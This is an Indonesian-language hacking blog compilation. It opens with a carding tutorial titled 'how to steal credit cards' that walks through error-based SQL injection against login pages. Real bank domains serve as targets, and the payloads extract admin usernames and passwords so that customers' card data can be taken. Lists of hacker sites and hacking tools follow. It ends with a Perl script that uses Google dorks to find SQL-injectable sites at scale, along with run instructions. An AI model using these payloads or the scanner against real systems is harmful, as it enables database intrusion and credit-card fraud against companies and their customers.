Cara mencuri kartu credit

  

hm...!!Sebelum nya maaf kan penulis kalau judul nya cenderung untuk berniat jahat.tapi jangan salah...!!justru setelah membaca tulisan yang singkat ini mampu membuat para perusahaan memiliki security yang benar-benar bisa di andalkannach...!!kita mulai untuk mengetahui aksi-aksi para carder.sebenar nya tak perlu mempunyai banyak ilmu mengenai IT(Internet Technology)cukup sering browsing/surfing.berikut akan saya ulas sedikit aksi dari para carder. SQL(Simple Query Laguage)tau gak apa SQL ini?kalo lom tau nach...cari tau dulu dech. untuk mencari perusahaan yang ingin kita kuras database/isi-isi dan termasuk kartu kredit para pelanggan nya.Caranya:gunakan search engine.yang saat ini paling populer yaitu GOOGLE.ketikan nama perusahaan yang akan di tuju.contoh nya:http//:www.bankbri.co.id.maka tambahkan di akhirnya kata-kata ADMIN/ASP Aatau PHP. EH TAU GAK??HTTP-WWW-PHP-ASP???DUH..GIMANA MO JADI HACKER KALO KEPANJANGAN ITU AJA GAK TAU.ININIH KEPANJANGAN NYA.ARTINYA CARI SENDIRI... HTTP=HYPER TEXT TRANSPER PROTOCOL WWW=WORD WIDE WEB PHP=HYPER TEXT PREPROCESSOR ASP=ACTIVE SERVER PAGE Naah...!!kalo udah tau kepanjangan nya.khan enak...!! kita lanjut pembahasan kita kali ini.tadi kan dah di contoh kan bankmandiri.co.id yang akan di kuras.ketikkan di ujung nya tambahan admin.asp ato php.maka secara otomatis akan dipinta username dan password nya. naah..tugas kita adalah mencari username dan pasword nya.gimana caranya bang??kita pura-pura tau aja dengan memasukkan dibagian username+password.eeh sebelum nya.tau gak???kalo pesan error itu memberi arahan untuk mencari username nya.nah...gini cara-caranya.ada lima caranya ketikkan dibagian username:

1. '; drop table user--(-;=dinamakan: single line comment,gunanya apa?gunanya agar tidak terjadi error pada saat dijalankan
2. pada bagian username: admin'--
3. ------------^^------------------: 'or 1=1-
4. ------------^^------------------: 'union select 1, 'fictional_user' . 'some_password' . 1--
5. atau dengan sengaja mengisi bidang username salah untuk mendapat kan pesan error yang ditampilkan(error message)gunanya melacak dari pesan tadi.jangan salah lho.....pesan error ternyata ada fungsinya. ketikkan saja: 'having 1=1- -

maka pesan yang akan muncul sebagai berikut:
[Microsoft ODBC SQL SERVER DRIVE] [SQL SERVER] colomn 'USER.id is invalid in the select list because it not contained in an aggregate function and there is no group by clause/ proces_login.asp,line 35
 

nah....!! sekarang kita tau.kalau pesan error nya bilang begitu berarti dia pake  'user.id.maka kembali ketikkan ulang di username: 'grup by user.id having 1=1- -
maka otomatis akan muncul pesan error lagi sama seperti di atas cuma ada perubahan pada bagian stelah colomn ='user.username'
naaah..!!kita dapat lagi.maka kita susul lagi dengan mengisikan pada username,sekali ini kita cek password nya.dia pake password ato gak.
ketikkan di username: 'group by user.id, user.username.password,user.privs having 1=1- -
jika memungkin kan tidak terjadi error maka tabel user mamang bener ada password nya.maka kita coba lagi isi di bidang username: 'union select sum(username)from user- -
tau gak?? sum=yang terdapat angka metematis/integer.seperti 1234 sampe 9.jika error berarti username brtype varchar.apalagi tuh varchar bang??varchar=huruf yang tidak memiliki nilai matematis.dari A ampe Z.lah..kalo bener dia pake varchar maka akan muncul pesan error. koq errror terus seeh??karna emang kita khan mencari username+passwrd dari pesan errornah...!!!kita lanjut.sekarang pesan error nya begini:
MICROSOFT OLE DB Provider for ODBC driver error'8004e07'
[MICROSOFT] [ODBC SQL SERVER DRIVER] [SQL SERVER]
The sum or average aggregate operation cannot take a varchar data type as an argument
/process_login.asp,line 35

maka kita isi lagi: 'unio select
pesan error nya kurang lebih berbunyi:
@@version,1,1,1- -
Microsoft OLEDB,PROVIDER FOR ODBC DRIVER ERROR ' 8004E07 ' [MICROSOFT] [ODBC SQL Server Driver] [SQL Server]
syntax error convertingthe nvachar value
' microsoft SQL Server 2000-8.00.194(intelx86)aug 6 2000 00:57:48 Copy right (c)1988-2000 microsoft corporation enterprice edition on windows NT 5.0(build 2195:server pack 2) to 2 column of data type int.
/process_login.asp,line 35

nah....!! selanjut nya atas perintah pesan tadi kita mengkonversi konstanta @@version kedalam bentuk integer
username: 'union select min(username),1,1,1 from user where username> 'a' - -
maka akan muncul error message:
microsoft OLE DB provider for ODBC dRIVER ERROR '8840e07'
[microsoft] [odbc sql server driver] [sql server]syntax error converting the varchar value 'ADMIN' to a column of data type int.
/process_login.asp,line 35

nah....!! ada account admin.maka tugas kita gali lagee...
username: 'union select min(username),1,1,1 from user where username> ' admin ' - -

maka akan muncul pesan error
microsoft OLE DB Provider for ODBC driver error ' 80040e07'
[microsoft] [ODBCSQL SERVER DRIVER] syntax error converting the varchar value ' roger ' to a column of data type int.
/process_login.asp,line 35

oke.....!!sekarang kita dapet username dengan nama : roger sekarang kita cari password nya,untuk pengguna roger :
username= ' union select password,1,1,1from user where username= ' admin ' - -  

maka akan muncul pesan error.yang berbunyi........misal:
microsoft OLEDB Provider for ODBC driver error '8004e07'
[microsoft] [ODBC SQL SERVER DRIVER] syntax error converting the varchar value ' bryan 200' to a column of data type
/process_login.asp,line 35

DAPAT......!!!KALAU UDAH BEGINI MAU APA LAGI?? TERSERAH LOE DECH...mau ngapain aja loe suka-suka ati kau lah.mau di acak-acak tuch database nya.tapi...jangan lupa.berhubung judul kita kali ini CARDING(PEMBOBOL KARTU KREDIT)Nah...musti kartu kredit pelanggan yang di cari.....
nah...untuk kali ini udah dulu dech....ampe sini aja doeloe.eiiit...tapi masih ada lagi yang harus kamu ketahui.yaitu setelah dapet kartu kredit kira-kira tuch kartu masih valid gak 
ya???jangan-jangan tuch kartu dah abis masa berlakunya cemen dech jadinya....hehehe.jadi gimana caranya bang??cara menguji validitas kartu kredit bisa dibaca di: lanjutan carding/pembobol kartu kredit.
  nahh..kalo udah dapet tuh kartu kredit yang asli...jangan coba-coba asal maen beli.sembunyikan identitas doeloe..caranya bang???pokok nya baca aja di judul itu dech....dijamin gak nyessel.
selamat mencoba

Situs Hacker Indonesia

    Berikut ini adalah list daftar situs hacker Indonesia / daftar situs hacking Indonesia / daftar web hacker Indonesia / daftar web hacking Indonesia / daftar website hacker indonesia / daftar website hacking Indonesia / daftar situs cracker Indonesia / daftar situs cracking Indonesia / daftar web cracker Indonesia / daftar web cracking Indonesia / daftar website cracker indonesia / daftar website cracking Indonesia.
Berikut adalah List Situs Hacker Indonesia:

1. www.binushacker.net
2. www.jasakom.com
3. www.echo.or.id
4. www.kecoak.org
5. www.devilzc0de.org
6. www.spyrozone.net
7. www.yogyacarderlink.web.id
8. www.nyit-nyit.net
9. www.indonesianhacker.or.id
10. www.muslimhacker.net
11. www.sekuritionline.net
12. www.exploit-id.com
13. www.surabayahackerlink.org
14. www.xcode.or.id
15. www.hacker-newbie.org

Berikut ini adalah daftar website hacker luar negeri / List site hacker / list site hacking / list web hacker / list web hacking / list website hacker / list website hacking / list site cracker / list site cracking / list web cracker / list web cracking / list website cracker / list website cracking around the world.
Tambahan List Situs Hacker Luar Negeri:

1. www.packetstormsecurity.org
2. www.phrack.org
3. www.blackhat.com
4. www.hackforums.net
5. www.hackinthebox.org
6. www.securityxploded.com
7. www.hackaday.com
8. www.darknet.org.uk
9. www.securiteam.com
10. www.seclist.org
11. www.metasploit.com
12. www.backtrack-linux.org
13. www.secmaniac.com
14. www.irongeek.com
15. www.hak5.org

Sebenernya masih banyak lagi yang lainnya, cuman ya cukup sampai situ aja ya listnya. Yang lain bisa dicari sendiri referensinya
Semoga bermanfaat, selamat menimba ilmu..

Tools Hacker

Tool apa saja yang biasa di pakai seorang hacker ? Ada banyak tool dari berbagai situs "hackX0r" di internet, bagaimana kita mengetahui apa yang kita perlukan dan mana yang tidak? Baiklah, pada posting ini akan coba dijelaskan beberapa tool dasar yang seringkali hacker gunakan. Namun perlu di ketahui bahwa tidak semua hacker memerlukan atau menggunakan tool-tool ini, tapi kebanyakan sich begitu.
Daftar tool yang tertulis disini tidaklah lengkap, dan setiap hari ada saja program baru yang dirilis oleh hacker, jadi hanya dasar-dasarnya.

-------------------------------------------------------------------------------------------------

CATATAN: Jangan mendownload program apapun dari website hacking yang di host angelfire, geocities , tripod atau warez. Mengapa? karena besar kemungkinan berisikan trojan, worm, virus dan berbagai kode jahat lainnya. Saya sarankan untuk mendownload program tersebut melalui website www.packetstromsecurity.org

-------------------------------------------------------------------------------------------------

Berikut ini tool yang umum digunakan oleh hacker:

PORT SCANNER
melakukan scanning target untuk melihat port mana saja yang terbuka.

LANGUAGE INTERPRETER atau COMPILER
Melakukan kompilasi script dan program.

CGI VULN SCANNER
melakukan scanning untuk melihat celah keamanan cgi.

EXPLOIT
mencoba memperoleh akses sebagai superuser pada suatu sistem.

ROOTKIT
agar tetap hidden dan membuat 'backdoor' agar mudah mengakses sistem tersebut nantinya.

TROJAN
mendapatkan akses ke suatu sistem sekedar mengeksploitasi user yang rada-rada bodoh ... hehehe.

SNIFFER
mengumpulkan data dari suatu jaringan komputer.

BRUTE FORCER
mencoba berbagai kombinasi karakter hingga mendapatkan password yang sebenarnya.

WINGATE SCANNER
Scan terhadap ip dan memeriksa apakah ada WinGate yang terinstall

GDB
gnu debugger untuk mempelajari lebih dalam tentang bagaimana program tersebut bekerja.

GCC
gnu c compiler untuk kompilasi program C dan menjadikannya program tersebut lebih mudah dipahami dan digunakan.

Kira-kira demikian yang dapat disampaikan, ini hanyalah daftar umum dan tidaklah lengkap. Sekali kita memiliki tool ini kita dapat bergerak ke tingkat lanjut. Hanya saja, jangan mencoba seluruh program sejenis "NUkeR-2k" atau berbagai program yang ditawarkan melalui berbagai website yang tidak resmi dan kurang terkenal hanya karena ingin tampil beda. Buang-buang waktu saja!

Dan sekali lagi, tulisan ini pernah saya baca dan saya posting ulang hanya dengan satu tujuan yaitu Pengetahuan saja, untuk lebih detail cara penggunaanya silahkan mencoba

SQL Injection Scanner [perl]

yeah, g'd evening
Share tools lagi nih, kemarin gw share tools  SQL Injection scanner yg di tuliskan menggunakan bahasa PHP.
Dan sekarang mari kita coba scanner yang lebih keren lagi, scanner ini ditulis menggunakan bahasa Perl (wiw)
Check the source

#!/usr/bin/perl
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. Script : SQLi Vulnerable Scanner        .:.
# .:. Version : 3.0 fixed (06/10/2012)        .:.
# .:. Author : Metropolis                     .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. MySQL Injection                         .:.
# .:. MSAccess Injection                      .:.
# .:. MSSQL Injection                         .:.
# .:. Oracle Injection                        .:.
# .:. Blind Injection                         .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
#  Useless version :
#  http://pastebin.com/kKxCCJuU 1.0
#  http://pastebin.com/FyPcTLRw 2.0
use LWP::UserAgent;
use Getopt::Std;

getopt('kpo', \%opts);
if($opts{'k'} eq '')
{
print "[Help] SQLi.pl -k shopping.php?id= -p 500\n"; # Max: 50,100,500,700,etc...
}
if($opts{'p'} eq '')
{
    $opts{'p'} = 1;
}

print <<"Metropolis_intro";


    ___________
   |.---------.|
   ||      ||
   || 5c4nn3r ||   SQL injection attack!
   ||         ||    Break the system!
   |'---------'|
    `)__ ____('    
    [=== -- o ]
  __'---------'__
[::::::::::: :::]
[:::::::::::::::]
Metropolis_intro
system('COLOR A');
print "\n\n";
print "h4x0ring ...\n";
print "--------------------------\n\n";


for($start = 0;$start != $opts{'p'}*10;$start += 10)
{
    $t = "http://www.google.co.id/search?hl=fr&q=".$opts{'k'}."&btnG=Search&start=".$start;
    $ua = LWP::UserAgent->new;
    $ua->timeout(10);
    $ua->env_proxy;
    $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E");
    $response = $ua->get($t);
    if ($response->is_success)
    {
        $c = $response->content;
        @stuff = split(/<a href=/,$c);
        foreach $line(@stuff)
        {
            if($line =~/(.*) class=l/ig)
            {
                $out = $1;
                $out =~ s/"//g;
      $out =~s/$/\'/;
         
    $ua = LWP::UserAgent->new;
    $ua->timeout(10);
    $ua->env_proxy;
    $response = $ua->get($out);
            $error = $response->content();
            if($error =~m/SQL syntax/)
                {print "$out Vulnerable MySQL!\n";}
             
            elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
                {print "$out Vulnerable MS Access!\n";}
             
            elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
                {print "$out Vulnerable MSSQL!\n";}
         
            elsif($error =~m/mysql_fetch_array()/ || $error =~m/mysql_num_rows()/)
                {print "$out Vulnerable Blind Possible!\n";}
             
            elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
                {print "$out Vulnerable Oracle!\n";}
             
            }
        }
        }
        }

Jangan lupa save dengan ekstensi .pl (contoh: sql.pl)
Jangan lupa juga, ente harus udah install perl (kalo OS windows, coba install Active Perl, kalo Linux sih udah ada )
Scannernya ampuh juga kok :)
Buat jalanin programnya

perl namafile.pl -k <dork> -p <page>

contoh :

perl sql.pl -k inurl:gallery.php?id= -p 100